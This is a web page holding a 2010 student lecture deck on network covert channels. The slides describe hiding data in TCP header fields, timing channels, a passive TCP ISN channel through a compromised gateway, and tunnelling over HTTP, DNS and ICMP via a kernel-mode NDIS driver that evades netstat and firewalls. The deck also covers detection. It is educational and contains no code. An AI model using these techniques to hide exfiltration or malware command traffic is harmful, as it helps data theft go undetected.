Covert Channels Thomas Arnold CSCI 5235/Summer 2010 7/12/2010.

Slides:

Advertisements

Similar presentations

Network and Application Attacks Contributed by- Chandra Prakash Suryawanshi CISSP, CEH, SANS-GSEC, CISA, ISO 27001LI, BS 25999LA, ERM (ISB) June 2006.

Advertisements

FIREWALLS Chapter 11.

SYSTEM ADMINISTRATION Chapter 19

CSCI 530 Lab Firewalls. Overview Firewalls Capabilities Limitations What are we limiting with a firewall? General Network Security Strategies Packet Filtering.

Raw Sockets CS-480b Dick Steflik Raw Sockets Raw Sockets let you program at just above the network (IP) layer You could program at the IP level using.

Firewalls and Intrusion Detection Systems

 Firewalls and Application Level Gateways (ALGs)  Usually configured to protect from at least two types of attack ▪ Control sites which local users.

Traffic Management - OpenFlow Switch on the NetFPGA platform Chun-Jen Chung( ) Sriram Gopinath( )

Common IS Threat Mitigation Strategies An overview of common detection and protection technologies Max Caceres CORE Security Technologies

1 Some TCP/IP Basics....NFSDNSTELNETSMTPFTP UDPTCP IP and ICMP Ethernet, serial line,..etc. Application Layer Transport Layer Network Layer Low-level &

Transition Mechanisms for Ipv6 Hosts and Routers RFC2893 By Michael Pfeiffer.

FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. 6 Packet Filtering By Whitman, Mattord, & Austin© 2008 Course Technology.

Firewalls CS591 Topics in Internet Security November Steve Miskovitz, Steve Peckham, Kan Hayashi.

Information Networking Security and Assurance Lab National Chung Cheng University Anti-hacker Tool Kit: CH13 Port Redirection Jared 04/03/31.

Introduction to InfoSec – Recitation 12 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

1 Review of Important Networking Concepts Introductory material. This slide uses the example from the previous module to review important networking concepts:

1 Enabling Secure Internet Access with ISA Server.

Embedding Covert Channels into TCP/IP

FIREWALL TECHNOLOGIES Tahani al jehani. Firewall benefits  A firewall functions as a choke point – all traffic in and out must pass through this single.

Information Hiding: Covert Channels Amir Houmansadr CS660: Advanced Information Assurance Spring 2015 Content may be borrowed from other resources. See.

Lecture 22 Page 1 Advanced Network Security Other Types of DDoS Attacks Advanced Network Security Peter Reiher August, 2014.

Protocol Basics. IPSec Provides two modes of protection –Tunnel Mode –Transport Mode Authentication and Integrity Confidentiality Replay Protection.

Port Knocking Software Project Presentation Paper Study – Part 1 Group member: Liew Jiun Hau ( ) Lee Shirly ( ) Ong Ivy ( )

Packet Filtering. 2 Objectives Describe packets and packet filtering Explain the approaches to packet filtering Recommend specific filtering rules.

FIREWALL Mạng máy tính nâng cao-V1.

B OTNETS T HREATS A ND B OTNETS DETECTION Mona Aldakheel

IIT Indore © Neminath Hubballi

January 2009Prof. Reuven Aviv: Firewalls1 Firewalls.

Linux Networking and Security Chapter 11 Network Security Fundamentals.

Chapter 6: Packet Filtering

Covert Communications Simple Nomad DC Feb2004.

CSCI N241: Fundamentals of Web Design Copyright ©2004  Department of Computer & Information Science Tools of Web Development 1: Module B: Internet Protocols.

Operating Systems Lesson 10. Networking Communications protocol is the set of standard rules for ◦ Data representation ◦ Signaling ◦ Authentication ◦

KONOE, a toolkit for an object- oriented online environment, with Gate Package M.Abe,Y.Nagasaka,F.Fujiwara, T.Tamura,I.Nakano,H.Sakamoto, Y.Sakamoto,S.Enomoto,

1 TCP/IP Perversion Rares Stefan, Third Brigade Inc. SecTor 2007.

Defense Techniques Sepehr Sadra Tehran Co. Ltd. Ali Shayan November 2008.

Module 4: Configuring ISA Server as a Firewall. Overview Using ISA Server as a Firewall Examining Perimeter Networks and Templates Configuring System.

Protecting Internet Communications: Encryption  Encryption: Process of transforming plain text or data into cipher text that cannot be read by anyone.

Packet Filtering Chapter 4. Learning Objectives Understand packets and packet filtering Understand approaches to packet filtering Set specific filtering.

1 The Internet and Networked Multimedia. 2 Layering  Internet protocols are designed to work in layers, with each layer building on the facilities provided.

PRESENTED BY P. PRAVEEN Roll No: 1009 – 11 – NETWORK SECURITY M.C.A III Year II Sem.

1 Topic 2: Lesson 3 Intro to Firewalls Summary. 2 Basic questions What is a firewall? What is a firewall? What can a firewall do? What can a firewall.

Fundamentals of Proxying. Proxy Server Fundamentals  Proxy simply means acting on someone other’s behalf  A Proxy acts on behalf of the client or user.

Network Security. 2 SECURITY REQUIREMENTS Privacy (Confidentiality) Data only be accessible by authorized parties Authenticity A host or service be able.

Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.

Distributed Denial of Service Attacks Shankar Saxena Veer Vivek Kaushik.

Packet Filtering COMP 423. Packets packets datagram To understand how firewalls work, you must first understand packets. Packets are discrete blocks of.

Covert Tunnels in your Network Next Generation Network Warfare David Gordon Gabriel Girard Universite de Sherbrooke.

Network Sniffer Anuj Shah Advisor: Dr. Chung-E Wang Department of Computer Science.

Advanced Packet Analysis and Troubleshooting Using Wireshark 23AF

Rootkits, Backdoors, and Trojans ECE 4112 – Lab 5 Summary – Spring 2006 Group 9 Greg Sheridan Terry Harvey Group 10 Matthew Bowman Laura Silaghi Michael.

1 Microsoft Windows 2000 Network Infrastructure Administration Chapter 4 Monitoring Network Activity.

CSE 592 INTERNET CENSORSHIP (FALL 2015) LECTURE 22 PHILLIPA GILL - STONY BROOK U.

Chapter 8 Network Security Thanks and enjoy! JFK/KWR All material copyright J.F Kurose and K.W. Ross, All Rights Reserved Computer Networking:

Overview of Firewalls. Outline Objective Background Firewalls Software Firewall Hardware Firewall Demilitarized Zone (DMZ) Firewall Types Firewall Configuration.

CMSC 691 IAUMBC Analysis and Detection of Network Covert Channels Sweety Chauhan CMSC 691 IA 30 th Nov. 2005

Firewalls A brief introduction to firewalls. What does a Firewall do? Firewalls are essential tools in managing and controlling network traffic Firewalls.

Course Title: WEB SECURITY Chapter No: 01 “Introduction to Web-Security” 1 Maiwand Institute Of Higher Education.

IPSec – IP Security Protocol By Archis Raje. What is IPSec IP Security – set of extensions developed by IETF to provide privacy and authentication to.

TCP/IP Illustrated, Volume 1: The Protocols Chapter 6. ICMP: Internet Control Message Protocol ( 월 ) 김 철 환

CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Covert Channels.

WIRESHARK Lab#3. Computer Network Monitoring  Port Scanning  Keystroke Monitoring  Packet sniffers  takes advantage of “friendly” nature of net. 

TCP/IP1 Address Resolution Protocol Internet uses IP address to recognize a computer. But IP address needs to be translated to physical address (NIC).

Mike Switlick. Overview What is a covert channel? Storage / Timing Requirements Bunratty attack Covert_tcp Questions.

IPv6 Security Issues Georgios Koutepas, NTUA IPv6 Technology and Advanced Services Oct.19, 2004.

1 CNLab/University of Ulsan Chapter 19 Firewalls  Packet Filtering Firewall  Application Gateway Firewall  Firewall Architecture.

CS590B/690B Detecting Network Interference (Fall 2016)

COVERT STORAGE CHANNEL MODULE

Presentation transcript:

Covert Channels Thomas Arnold CSCI 5235/Summer /12/2010

Outline Background Covert Channel Designs Detection Methods Example: Passive Covert Channel Example: Tunneling NDIS

What are covert channels? You want to communicate with someone without being observed Cryptography/Encryption is not good enough – You want to hide the fact you are communicating at all – Best way is to hide the communication in innocuous-looking network traffic or data – Firewall must let the traffic pass through

Why would you need covert channels? Stealing of confidential information – Government/corporate espionage, Intelligence gathering of criminal/terrorist activity Malware – Rootkits, keyloggers, botnets, etc.

Covert Channel Techniques Storage Channels – Hide data within unused TCP/IP packet header fields TCP Flags field, TCP ISN, etc. Timing channels – Modulate system resources in such a way that a receiver can observe and decode it – Port Knocking, varying packet rates, etc. Steganography – Hide messages in , images

Detection/Prevention Detection – Network traffic analysis Higher bandwidth usage Formatting of HTTP headers Request regularity Prevention – Block susceptible outbound ports/protocols

Example: Passive TCP Covert Channels Technique uses existing traffic (does not generate it’s own) Requires that attacker control the network gateway as well Uses the TCP ISN field to transmit data – Compromised gateway filters out secret TCP ISN to send to attacker, and forwards the legitimate traffic to the intended destination Pros/Cons – Blends in with existing traffic, difficult to detect – ISN data must not look too conspicuous, and gateway processing can be very complicated to filter out and forward the legitimate traffic

Example: Passive TCP Covert Channels

Example: Tunneling using NDIS Idea is to tunnel information on existing protocols such as HTTP, DNS, and ICMP Pros/Cons with each protocol – HTTP good for large data transfer, but more conspicuous – DNS not great for data transfer, but good for C&C – ICMP is good for C&C but is often blocked Author of The Rootkit Arsenal proposes writing your own TCP/IP stack using MS Windows NDIS

Example: Tunneling using NDIS Since you have already have root privileges, you can implement a Kernel Mode NDIS Driver – Complete control, can act as a NIC and create your own MAC/IP addresses, and format any of the protocol headers as you wish Built in diagnostic tools such as ipconfig, netstat, etc. (as well as firewalls) can’t see it because they use the native TCP/IP stack Pros/Cons – Extremely difficult to detect, but also hard to implement